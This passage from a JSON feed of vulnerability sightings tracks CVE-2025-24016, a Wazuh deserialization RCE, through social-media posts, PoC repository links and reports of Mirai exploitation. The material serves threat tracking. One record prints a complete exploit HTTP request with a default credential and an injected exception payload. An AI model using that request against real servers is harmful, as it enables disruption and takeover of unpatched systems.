\u0434\u043e\u0432\u0456\u043b\u044c\u043d\u0438\u0439 Python-\u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 API. \u041c\u0456\u0448\u0435\u043d\u044c \u2014 \u043d\u0435\u0437\u0430\u0445\u0438\u0449\u0435\u043d\u0456 \u0441\u0435\u0440\u0432\u0435\u0440\u0438 \u0437 \u0432\u0435\u0440\u0441\u0456\u044f\u043c\u0438 4.4.0\u20134.9.0 \ud83e\udd16 #cybernews", "creation_timestamp": "2025-06-10T15:19:27.000000Z"}, {"uuid": "bf7978da-6069-49a5-9f48-cc2c984500bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/5KpqkHLdhavDOziPsV3wCj_hqmHzrkEpONDHycExmylKgM8", "content": "", "creation_timestamp": "2025-07-14T03:00:05.000000Z"}, {"uuid": "6afb4700-a1a4-4d35-b021-aa0dba3a5eaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/Qs9ZZ8VQvn9t_EBdVGO2euibwUjWHRWabFHY-p6t6dUnGBw", "content": "", "creation_timestamp": "2025-06-11T15:00:09.000000Z"}, {"uuid": "89323819-7bf7-4933-ab6b-57ed845248e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/information_security_channel/53680", "content": "Mirai Botnets Exploiting Wazuh Security Platform Vulnerability\u00a0\nhttps://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/\n\nCVE-2025-24016, a critical remote code execution vulnerability affecting Wazuh servers, has been exploited by Mirai botnets.\nThe post Mirai Botnets Exploiting Wazuh Security Platform Vulnerability\u00a0 (https://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2025-06-09T17:14:40.000000Z"}, {"uuid": "0fdb8e55-a20a-4a80-9509-9037889011ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://t.me/CyberBulletin/2675", "content": "\u26a1CVE-2025-24016: Unsafe Deserialization Vulnerability in Wazuh Leading to Remote Code Execution.\n\n#CyberBulletin", "creation_timestamp": "2025-03-18T05:11:08.000000Z"}, {"uuid": "15b15ecc-7efa-4eda-b79e-1707a7f627eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/6989", "content": "#exploit\n1. CVE-2024-48248:\nNAKIVO Backup Replication Vulnerability\nhttps://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248\n\n2. CVE-2025-24016:\nWazuh Unsafe Deserialization RCE\nhttps://github.com/0xjessie21/CVE-2025-24016\n\n3. CVE-2025-1094:\nSQLI to RCE via WebSocket\nhttps://github.com/soltanali0/CVE-2025-1094-Exploit", "creation_timestamp": "2025-02-28T07:48:31.000000Z"}, {"uuid": "e9036636-128d-4658-b99c-e36aee9a373a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/DrIoZRFAX_ghcTB2uB2STv6m12W37rsArwIvIxT09N9Ltk3n", "content": "", "creation_timestamp": "2025-04-28T05:58:52.000000Z"}, {"uuid": "96ad6b86-b90c-4822-8a97-8b6fdd5412fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/abp-92o5hKBAk_DtUBF145InVAyFbzPIrVHjJ0eU3_qJ9UM", "content": "", "creation_timestamp": "2025-04-22T01:00:07.000000Z"}, {"uuid": "c3d93442-c6a9-4149-a51c-43117f8dbd69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/FISRGv2_C9Deo8v1NrjPE43U_NehW980T6ZHCVN0ysWZmns", "content": "", "creation_timestamp": "2025-02-16T16:00:19.000000Z"}, {"uuid": "a15c6d1e-ce04-42f9-be68-1e23567c3c2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/4173", "content": "#GitHub #Tools\n\nWazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses\n\n https://github.com/0xjessie21/CVE-2025-24016\n\nTool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.\n\nhttps://github.com/DrunkF0x/ADSpider\n\nMorgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.\n\nhttps://GitHub.com/VFA250/Morgan\n\n#HackersFactory", "creation_timestamp": "2025-03-05T01:42:04.000000Z"}, {"uuid": "6a459d18-1c40-49c8-a1c9-cc37df69d977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2528", "content": "CVE-2025-24016\n*\nRCE in Wazuh server\nwazuh-manager version >= 4.4.0\nPatched in version >= 4.9.1\n\nPOST /security/user/authenticate/run_as HTTP/1.1\nHost: target.com:55000\nCache-Control: max-age=0\nAccept-Language: en-US\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36\nAccept: application/json\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\nAuthorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded \"wazuh-wui:MyS3cr37P450r.*-\"\nContent-Type: application/json\nContent-Length: 83\n\n{\n  \"__unhandled_exc__\": {\n    \"__class__\": \"exit\",\n    \"__args__\": []\n  }\n}", "creation_timestamp": "2025-02-22T22:51:12.000000Z"}, {"uuid": "c604682c-a0ac-462c-a70e-8d4faa8c396a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8035", "content": "#GitHub #Tools\n\nWazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses\n\n https://github.com/0xjessie21/CVE-2025-24016\n\nTool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.\n\nhttps://github.com/DrunkF0x/ADSpider\n\nMorgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.\n\nhttps://GitHub.com/VFA250/Morgan\n\n#HackersFactory", "creation_timestamp": "2025-03-05T04:04:34.000000Z"}, {"uuid": "78555fda-678e-4b39-82f1-95c2b7f09be1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11868", "content": "#exploit\n1. CVE-2024-48248:\nNAKIVO Backup Replication Vulnerability\nhttps://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248\n\n2. CVE-2025-24016:\nWazuh Unsafe Deserialization RCE\nhttps://github.com/0xjessie21/CVE-2025-24016\n\n3. CVE-2025-1094:\nSQLI to RCE via WebSocket\nhttps://github.com/soltanali0/CVE-2025-1094-Exploit", "creation_timestamp": "2025-02-27T22:17:19.000000Z"}, {"uuid": "ab746d25-8093-4226-9f9a-a4065304c14f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/7079", "content": "\u2699\ufe0f Wazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.\n\n\ud83d\udd17 Source:\n https://github.com/0xjessie21/CVE-2025-24016\n\n#wazuh #deserialization #rce #cve", "creation_timestamp": "2025-03-30T19:49:57.000000Z"}, {"uuid": "7449362d-dbeb-4e19-89e5-e1a3e09ad606", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3lhvuva6clc2a", "content": "", "creation_timestamp": "2025-02-11T14:33:47.154078Z"}, {"uuid": "4c1882c8-7ca0-4aa9-b1c9-5103d34cefef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/113990570444579916", "content": "", "creation_timestamp": "2025-02-12T11:01:11.640616Z"}, {"uuid": "1d8af5c3-1704-47ce-a01a-48475355a3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/113991073139943359", "content": "", "creation_timestamp": "2025-02-12T13:09:00.424182Z"}, {"uuid": "2016fa30-4e9d-48ed-8ce9-8fc676cc1daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/tmjintel.bsky.social/post/3li3fgfqtpm24", "content": "", "creation_timestamp": "2025-02-13T19:13:02.286812Z"}, {"uuid": "91ba88a2-1cb5-4e6e-b8ef-2eed36f8acae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24016", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkmndgn3sl2o", "content": "", "creation_timestamp": "2025-03-18T02:40:10.883215Z"}, {"uuid": "0f06807d-aa7c-4f8b-ad99-8af2fc7c68eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lkkyp4o24y2b", "content": "", "creation_timestamp": "2025-03-17T10:58:15.255337Z"}, {"uuid": "c33f4628-ec0f-41f5-9ab3-ec37fa7aa66a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lklj7riths22", "content": "", "creation_timestamp": "2025-03-17T15:53:59.286332Z"}, {"uuid": "995a6fb4-d18a-4eb5-a7c2-e2cb0b740a36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://github.com/MuhammadWaseem29/CVE-2025-24016", "content": "", "creation_timestamp": "2025-03-12T13:26:49.000000Z"}, {"uuid": "85e29b2f-30ed-48f1-b9ec-e7694864ff33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lreckkwmql2i", "content": "", "creation_timestamp": "2025-06-11T21:02:28.859141Z"}, {"uuid": "14dfaee0-55ca-4978-bdab-a7def9f2a35a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/4190622", "content": "", "creation_timestamp": "2025-06-10T18:50:11.596925Z"}, {"uuid": "6f797b46-8bd9-491b-8df6-2d62b4ef6788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrrgpimc5v2g", "content": "", "creation_timestamp": "2025-06-17T02:21:19.766001Z"}, {"uuid": "3ee87655-c5cc-442e-8036-81a64e00648d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lrcsoxh3ds2a", "content": "", "creation_timestamp": "2025-06-11T06:45:56.648696Z"}, {"uuid": "8845a86c-8a71-4a31-8bc9-cb2d5917d6fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "d662c34a-3547-4926-923d-c62537621d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lohbckpx5w2q", "content": "", "creation_timestamp": "2025-05-05T21:02:25.305827Z"}, {"uuid": "6cb295a9-70fa-4480-aeaf-bb6fccd7e983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "9fdb3e10-daf8-40fb-b1a3-629d6d670ab6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/tomcat/statuses/114664791238342001", "content": "", "creation_timestamp": "2025-06-11T12:44:22.842035Z"}, {"uuid": "05e5f2a0-9f96-4b7f-8945-02372bf9bc58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114862970371156766", "content": "", "creation_timestamp": "2025-07-16T12:43:56.809351Z"}, {"uuid": "cdf6f560-6048-46ef-b2fc-ad370bd490ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/campuscodi.risky.biz/post/3lr7o5ja7gk2t", "content": "", "creation_timestamp": "2025-06-10T00:46:30.749912Z"}, {"uuid": "502bc8c3-af57-437f-8c69-aa89f3149628", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lwcpwz6otd2y", "content": "", "creation_timestamp": "2025-08-13T21:02:39.738923Z"}, {"uuid": "093c3424-3ea0-4fa3-a8ec-efeac5575d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb", "content": "", "creation_timestamp": "2025-08-12T16:30:43.000000Z"}, {"uuid": "dfefc389-9b86-40ad-b277-5b5eef368065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://gist.github.com/alon710/e20ebfb9f770e0a0b0142546c91edb5e", "content": "", "creation_timestamp": "2026-01-24T22:34:18.000000Z"}, {"uuid": "05ffeb8a-421f-4d06-afc1-7ee8a78332b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://gist.github.com/alon710/448b0b00a78a311665a4c7ed4a14beb0", "content": "", "creation_timestamp": "2026-01-24T22:34:15.000000Z"}, {"uuid": "03620d9d-6c42-424b-812b-f0d0166cf063", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/573ac1af-09ee-407c-8c57-49f646908b21", "content": "", "creation_timestamp": "2026-02-02T12:25:59.085733Z"}, {"uuid": "9270464d-86dc-4633-b91f-6e2d72182c9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/33440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-30567 - WordPress WP01 < Path traversal\nURL\uff1ahttps://github.com/cybersecplayground/CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE---PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-21T19:16:43.000000Z"}, {"uuid": "a4bdbf88-0411-43ec-9a41-672e61132cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "Telegram/gIzyp5AayVdHT3smoUYr4SnZ6o-u4OES6PP_34cUd0HZWA", "content": "", "creation_timestamp": "2025-06-09T15:54:20.000000Z"}, {"uuid": "90b94fc3-b12f-4f53-b182-9d7c4fe3043c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/true_secator/7122", "content": "\u0412\u0441\u043b\u0435\u0434 \u0437\u0430 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u043c\u0438 \u0437\u0430 Mirai \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437 Akamai, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Wazuh, \u043e\u0442\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0443\u044e \u043a\u0430\u043a CVE-2025-24016.\n\nWazuh - \u044d\u0442\u043e \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u044b.\n\n\u0415\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0438 10 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u043e\u0431 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0438 CVE-2025-24016, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0443\u044e \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0432\u0435\u0440\u0441\u0438\u0438 4.4.0 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439, \u0434\u043e 4.9.1, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.\n\n\u041a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438, \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Wazuh \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043b\u044e\u0431\u044b\u043c \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a API (\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438\u043b\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u044b Wazuh \u0432 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0435) \u0438\u043b\u0438, \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445, \u0434\u0430\u0436\u0435 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0430\u0433\u0435\u043d\u0442\u043e\u043c.\n\n\u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0443\u0436\u0435 \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d PoC, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c DoS-\u0430\u0442\u0430\u043a\u0438, \u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u0441\u043f\u0443\u0441\u0442\u044f \u0432\u044b\u0448\u0435\u043b PoC, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0439 \u0438 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0445\u0430\u043d\u0438\u043f\u043e\u0442\u043e\u0432 Akamai, \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 in-the-wild\u00a0\u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0435\u0449\u0435 \u0432 \u043c\u0430\u0440\u0442\u0435.\n\n\u0422\u043e\u0433\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0440\u0430\u0437\u0443 \u0434\u0432\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Mirai, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 CVE-2025-24016 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Wazuh.\n\n\u041e\u0434\u0438\u043d \u0438\u0437 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Mirai \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u043c\u0430\u0440\u0442\u0430, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043b\u0443\u0436\u0438\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u043c \u0434\u043b\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 Mirai.\n\n\u0422\u043e\u0442 \u0436\u0435 \u0431\u043e\u0442\u043d\u0435\u0442 \u0442\u0430\u043a\u0436\u0435 